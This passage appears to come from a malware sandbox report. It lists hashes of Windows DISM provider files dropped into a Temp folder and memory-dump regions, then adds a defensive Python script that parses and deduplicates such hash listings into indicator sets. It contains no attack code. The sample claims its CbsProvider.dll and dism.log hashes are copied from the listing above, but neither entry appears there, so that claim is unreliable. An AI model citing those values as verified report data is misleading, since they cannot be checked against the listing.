| SHA512 | 4ad7132f0ad5a7228ec116c28d23ee9acfdbf4adf535b0b9995f2e7eec8776e652a0a18539c02b6f4b3e0c8fa2f75d5181577dec16993fa55cb971d7e82faac5 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\SetupPlatformProvider.dll.mui
| MD5 | 73e78fbbf6e6679fa643441c66628d37 |
| SHA1 | 57b70e6226c0cf3f8bc9a939f8b1ec411dedeff5 |
| SHA256 | 5d4dfc9bde18be1ec0b3834a65de6abab581e04c8c4f66ee14a62fb4b1b4cd06 |
| SHA512 | a045a6cdf9ca989b3ed9a50cda208affa17372f65b1d86e1bf4c10b5d5e3fee58c5d4b8ec0749a54e2e2156ed0e9776b59a8d3b78f062349873cb574ab3f77fa |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\SetupPlatformProvider.dll
| MD5 | 1ae66f4524911b2728201fff6776903c |
| SHA1 | 68bea62eb0f616af0729dbcbb80dc27de5816a83 |
| SHA256 | 367e73f97318b6663018a83a11019147e67b62ab83988730ebbda93984664dd3 |
| SHA512 | 7abf07d1338e08dc8b65b4f987eaff96d99aa46c892b5d2d79684ca7cf5f139d2634d9b990e5f6730f7f8a647e4fbb3d5905f9f2a5680250852671599f15ee69 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\ProvProvider.dll.mui
| MD5 | b8a8c6c4cd89eeda1e299c212dc9c198 |
| SHA1 | f88c8a563b20864e0fc6f3d63fadda507aa2e96e |
| SHA256 | 50ad19e21b6425d12aa57cd4656748877db1f147189ec44abb19ba90be8505ea |
| SHA512 | 4a6f0dac5b3b18e4942ce5f51b566ce3ba465baa43457384ee785d1c0e7c33f9b9396a143aac0398a34e4e2f7d704ba06d3cc68761fd3cb6f53f4043a906e475 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\ProvProvider.dll
| MD5 | 70c34975e700a9d7e120aaecf9d8f14b |
| SHA1 | e24d47f025c0ec0f60ec187bfc664e9347dc2c9c |
| SHA256 | a3e652c0bbe2082f2e0290da73485fb2c6e35c33ac60daa51a65f8c782dbd7a7 |
| SHA512 | 7f6a24345f5724d710e0b6c23b3b251e96d656fac58ea67b2b84d7d9a38d7723eae2c278e6e218e7f69f79d1cce240d91a8b0fd0d99960cacc65d82eb614a260 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\OSProvider.dll.mui
| MD5 | 0633e0fccd477d9b22de4dd5a84abe53 |
| SHA1 | e04fb5c3acb35d128c1ea6ee6fb0e9b3fe90d5a9 |
| SHA256 | b6758aba17f6cd74923ca0976dd580222851ef6435cd16b3b2b04e85280ce706 |
| SHA512 | e95ed1d8069d6f200f0a2ea8dd7688404af9db9ce5e229afcb625a1f9eb46ac9e7a1c2c4c5ce156b190514415679e82e213732e8e890ed1a89af9026e4e73fe3 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\OfflineSetupProvider.dll.mui
| MD5 | 015271d46ab128a854a4e9d214ab8a43 |
| SHA1 | 2569deff96fb5ad6db924cee2e08a998ddc80b2a |
| SHA256 | 692744ce4bba1e82ad1a91ab97eec2bac7146bc995e8e8ed59bc2c7d366af7ec |
| SHA512 | 6ba678da0475a6b1872c2e2c151b395a4d97390bed4671d3f918aab5e69cbc9ceafe72c3100ba060ac6586fd37682499fdeef7d7b1ab10f5ec2411c1438ed438 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\OfflineSetupProvider.dll
| MD5 | 9cd7292cca75d278387d2bdfb940003c |
| SHA1 | bab579889ed3ac9cb0f124842c3e495cb2ec92ac |
| SHA256 | b38d322af8e614cc54299effd2164247c75bd7e68e0eb1a428376fcedaca9a6f |
| SHA512 | ebf96839e47bef9e240836b1d02065c703547a2424e05074467fe70f83c1ebf3db6cb71bf0d38848ec25e2e81b4cbb506ced7973b85e2ab2d8e4273de720779d |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\MsiProvider.dll.mui
| MD5 | c5e60ee2d8534f57fddb81ffce297763 |
| SHA1 | 78e6b0e03c8bf5802b3ef429b105d7ae3092a8f2 |
| SHA256 | 1ec7b04a8c25812db99abec82c7b7bf915ae3f7594c5d071231cafab9c1fa145 |
| SHA512 | ce654295e8b16da7bd004453ae4a422fe8296a8c2343e56d819883b835c391a02537ecf4d155a281a9d38f2291ee0004506b7fd48a99c0f8881ff1e38ae8ebcc |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\MsiProvider.dll
| MD5 | 9a760ddc9fdca758501faf7e6d9ec368 |
| SHA1 | 5d395ad119ceb41b776690f9085f508eaaddb263 |
| SHA256 | 7ff3939e1ef015da8c9577af4edfdd46f0029a2cfe4e3dac574d3175516e095f |
| SHA512 | 59d095246b62a7777e7d2d50c2474f4b633a1ae96056e4a4cb5265ccf7432fed0ea5df9b350f44d70b55a726241da10f228d8b5cbee9b0890c0b9dc9e810b139 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\LogProvider.dll.mui
| MD5 | 8933c8d708e5acf5a458824b19fd97da |
| SHA1 | de55756ddbeebc5ad9d3ce950acba5d2fb312331 |
| SHA256 | 6e51af7cfda6be5419f89d6705c44587556a4abffd388020d7f19e007e122cd6 |
| SHA512 | ead5017d9d024a1d7c53634ae725438ea3a34eed8c9056ebbc4ebe5aab2055c0e67687ce7608724e4f66f55aa486a63024967b76a5638cde3dd88b3d3432ca1f |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\IntlProvider.dll.mui
| MD5 | 2eb303db5753eb7a6bb3ab773eeabdcb |
| SHA1 | 44c6c38e6ae5f9ce9d7ca9d45a3cc3020b1353e4 |
| SHA256 | aa43b64db4fdcd89e56ba5309f3ba2ffac2663ba30514e87c160687f4314221f |
| SHA512 | df1c8cefed4b5ef5a47f9bc0c42776611b3af709938a0900db79c6c9f4fae21acbbb6c4b1cad3c5a2051b622fe7e6e01486d34622742a981623fed933f1b1427 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\ImagingProvider.dll.mui
| MD5 | f2e2ba029f26341158420f3c4db9a68f |
| SHA1 | 1dee9d3dddb41460995ad8913ad701546be1e59d |
| SHA256 | 32d8c8fb9a746be209db5c3bdad14f361cf2bef8144c32e5af419c28efd35da3 |
| SHA512 | 3d45d7bcf21d5df56b516fc18f7dc1bf80e44258b0c810b199a7bc06047a547060956c9d79575b82d9b6992fb5fe64f5b0ef1e408363887ae81a64b6ff9fa03e |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\ImagingProvider.dll
| MD5 | 35e989a1df828378baa340f4e0b2dfcb |
| SHA1 | 59ecc73a0b3f55e43dace3b05ff339f24ec2c406 |
| SHA256 | 874137ee906f91285b9a018735683a0dd21bdeaf2e340cbc54296551ccf8be2d |
| SHA512 | c8d69e37c918881786a8fdab2a2c5d1632411b1f75082aeb3eb24a8ba5f93dcb39b3f4000e651f95452263525d98fd1d3cb834de93bed16fa6f92ef271c3a92a |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\IBSProvider.dll.mui
| MD5 | d4b67a347900e29392613b5d86fe4ac2 |
| SHA1 | fb84756d11bfd638c4b49268b96d0007b26ba2fb |
| SHA256 | 4ccfe7883bce7785b1387ad3872230159899a5337d30a2f81a937b74bcbc4ce5 |
| SHA512 | af0a2a3f813e1adfff972285c9655f50ce6916caaeff5cb82f6c7d76491ffc9b365a47f19750fc02d7122182bf65aae79ed167886c33f202d5a781ab83d75662 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\IBSProvider.dll
| MD5 | 120f0a2022f423fc9aadb630250f52c4 |
| SHA1 | 826df2b752c4f1bba60a77e2b2cf908dd01d3cf7 |
| SHA256 | 5425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0 |
| SHA512 | 23e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\GenericProvider.dll.mui
| MD5 | d6b02daf9583f640269b4d8b8496a5dd |
| SHA1 | e3bc2acd8e6a73b6530bc201902ab714e34b3182 |
| SHA256 | 9102fa05ed98d902bf6e95b74fdbb745399d4ce4536a29607b2156a0edfeddf0 |
| SHA512 | 189e87fcc2902e2a8e59773783d80a7d4dd5d2991bd291b0976cbd304f78bd225b353703735b84de41b5f59c37402db634c4acc805d73176cde75ca662efff50 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\FolderProvider.dll.mui
| MD5 | 22b4a3a1ec3b6d7aa3bc61d0812dc85f |
| SHA1 | 97ae3504a29eb555632d124022d8406fc5b6f662 |
| SHA256 | c81a992ecebd9260ff34e41383aaca1c64a9fa4706a4744ac814f0f5daa1e105 |
| SHA512 | 9329b60a60c45b2486000ed0aff8d260fdac3d0a8789823eaa015eab1a6d577012f9d12502f81bad9902e41545c3c3e77f434bc1a753b4f8430d01db2cdbe26c |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\FolderProvider.dll
| MD5 | 4f3250ecb7a170a5eb18295aa768702d |
| SHA1 | 70eb14976ddab023f85bc778621ade1d4b5f4d9d |
| SHA256 | a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461 |
| SHA512 | e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\FfuProvider.dll.mui
| MD5 | dc826a9cb121e2142b670d0b10022e22 |
| SHA1 | b2fe459ede8ba99602ae6ea5fa24f0133cca2bc9 |
| SHA256 | ba6695148f96a5d45224324006ae29becfd2a6aa1de947e27371a4eb84e7451a |
| SHA512 | 038e9abff445848c882a71836574df0394e73690bc72642c2aa949c1ad820c5cbb4dedc4ee7b5b75fd5ac8a43813d416f23d28973de7a7f0e5c3f7112da6fe1b |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\DmiProvider.dll.mui
| MD5 | b7252234aa43b7295bb62336adc1b85c |
| SHA1 | b2c42a5af79530e7cf9bcf54fd76ae9d5f234d7f |
| SHA256 | 73709c25dc5300a435e53df97fc01a7dc184b56796cae48ee728d54d26076d6c |
| SHA512 | 88241009b342eb1205b10f7725a7cb1ec2c7135606459d038c4b8847efd9d5e0ad4749621f8df93746dd3ba8ab92d1b0f513ed10e2ba712a7991716f4c062358 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DismCore.dll
| MD5 | b1f793773dc727b4af1648d6d61f5602 |
| SHA1 | be7ed4e121c39989f2fb343558171ef8b5f7af68 |
| SHA256 | af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e |
| SHA512 | 66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\CbsProvider.dll.mui
| MD5 | 6c51a3187d2464c48cc8550b141e25c5 |
| SHA1 | a42e5ae0a3090b5ab4376058e506b111405d5508 |
| SHA256 | d7a0253d6586e7bbfb0acb6facd9a326b32ba1642b458f5b5ed27feccb4fc199 |
| SHA512 | 87a9e997d55bc6dbd05af1291fb78cd02266641d018ccfeb6826cb0de205aaf8a57b49e587462dbb6df2b86b54f91c0c5d3f87e64d7dbb2aea75ef143c5447ba |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\AssocProvider.dll.mui
| MD5 | 8833761572f0964bdc1bea6e1667f458 |
| SHA1 | 166260a12c3399a9aa298932862569756b4ecc45 |
| SHA256 | b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5 |
| SHA512 | 2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\AssocProvider.dll
| MD5 | 94dc379aa020d365ea5a32c4fab7f6a3 |
| SHA1 | 7270573fd7df3f3c996a772f85915e5982ad30a1 |
| SHA256 | dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907 |
| SHA512 | 998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\AppxProvider.dll.mui
| MD5 | bd0dd9c5a602cb0ad7eabc16b3c1abfc |
| SHA1 | cede6e6a55d972c22da4bc9e0389759690e6b37f |
| SHA256 | 8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3 |
| SHA512 | 86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\AppxProvider.dll
| MD5 | a7927846f2bd5e6ab6159fbe762990b1 |
| SHA1 | 8e3b40c0783cc88765bbc02ccc781960e4592f3f |
| SHA256 | 913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f |
| SHA512 | 1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f |
memory/4428-264-0x0000000073570000-0x00000000735A9000-memory.dmp
memory/4428-265-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-266-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4696-267-0x0000000000400000-0x000000000043D000-memory.dmp
memory/4428-268-0x0000000074A80000-0x0000000074AB9000-memory.dmp
memory/4428-269-0x0000000073570000-0x00000000735A9000-memory.dmp
memory/4428-270-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-271-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-272-0x0000000073210000-0x0000000073249000-memory.dmp
memory/4428-273-0x0000000073210000-0x0000000073249000-memory.dmp
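The dropped-file listing above is a flat sequence: a path line, then one `| ALGO | hexdigest |` row per algorithm, interleaved with `memory/...` dump references that carry no hashes. Turning that into a usable IOC set means parsing the rows, collapsing repeated entries (sandbox listings can record the same path and content more than once), checking that each digest has the length its algorithm implies, and noticing paths that were written with more than one content during detonation. The Python below is an added example, not code from the sandbox report or its vendor; the sample input is constructed in the report's layout, reusing two hash sets copied from the listing above, and the function names are the example's own. Note that a sandbox records every file written during detonation, including files written by legitimate Windows components the sample happened to start, so the resulting hash set should be triaged before it becomes a blocklist.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the report's own layout. The CbsProvider.dll and
# dism.log hash values are copied from the listing above; the repeated entry
# and the memory/ line are included on purpose to exercise dedupe and skipping.
SAMPLE = """\
C:\\Users\\Admin\\AppData\\Local\\Temp\\987E6406-8E9A-495B-96FD-990451531DCB\\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
memory/4428-222-0x0000000074A80000-0x0000000074AB9000-memory.dmp
C:\\Users\\Admin\\AppData\\Local\\Temp\\987E6406-8E9A-495B-96FD-990451531DCB\\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
C:\\Windows\\Logs\\DISM\\dism.log
| MD5 | c34ad3c4515e1549a2ccaab2c5f7785a |
| SHA1 | 8da31738c093d416b789ac7776d1394dbf824b49 |
| SHA256 | c659bded4594f52945703bac7ee80528fbae4d6f60e3d0957b505845dd2483fd |
| SHA512 | a2fc9758e9c21b38ea041547371727be0a7ef60334b73338be44c45302461285420728aa41b9ab283d327b5ca38e44a50afadfaa4a56f31639aac2fed9a96518 |
"""

# Expected hex-digit count per algorithm; anything else is truncated or mis-pasted.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|\s*$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


def parse_listing(text):
    """A non-table line opens a new entry; following '| ALGO | hex |' rows
    attach to it. memory/ lines open an entry too but collect no rows and
    are discarded at the end."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m and current is not None:
            current.hashes[m.group(1)] = m.group(2).lower()
        elif not line.startswith("|"):
            current = DroppedFile(path=line)
            entries.append(current)
    return [e for e in entries if e.hashes]


def validate(entry):
    """Return a list of problems with the entry's digests (empty if clean)."""
    problems = []
    for algo, n in DIGEST_LEN.items():
        value = entry.hashes.get(algo)
        if value is None:
            problems.append(f"{algo} missing")
        elif len(value) != n:
            problems.append(f"{algo} has {len(value)} hex chars, expected {n}")
    return problems


def dedupe(entries):
    """Collapse repeated (path, SHA256) pairs, keeping first-seen order."""
    seen, out = set(), []
    for e in entries:
        key = (e.path.lower(), e.hashes.get("SHA256"))
        if key not in seen:
            seen.add(key)
            out.append(e)
    return out


def same_path_different_hash(entries):
    """Paths recorded with more than one SHA256: rewritten with different
    content during detonation, worth a second look."""
    by_path = {}
    for e in entries:
        by_path.setdefault(e.path.lower(), set()).add(e.hashes.get("SHA256"))
    return sorted(p for p, s in by_path.items() if len(s) > 1)


def ioc_set(entries):
    """Unique SHA256 values, sorted, ready for a hunt query after triage."""
    return sorted({e.hashes["SHA256"] for e in entries if "SHA256" in e.hashes})


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    unique = dedupe(parsed)
    print(f"{len(parsed)} hashed entries, {len(unique)} unique")
    for e in unique:
        print(e.path, validate(e) or "ok")
    print("rewritten paths:", same_path_different_hash(parsed))
    print("SHA256 IOCs:", ioc_set(unique))
```

Run it on a listing saved to a text file by replacing `SAMPLE` with the file's contents; the `validate` step is what catches a digest that lost characters in copy-paste before it silently fails to match anything in a hunt.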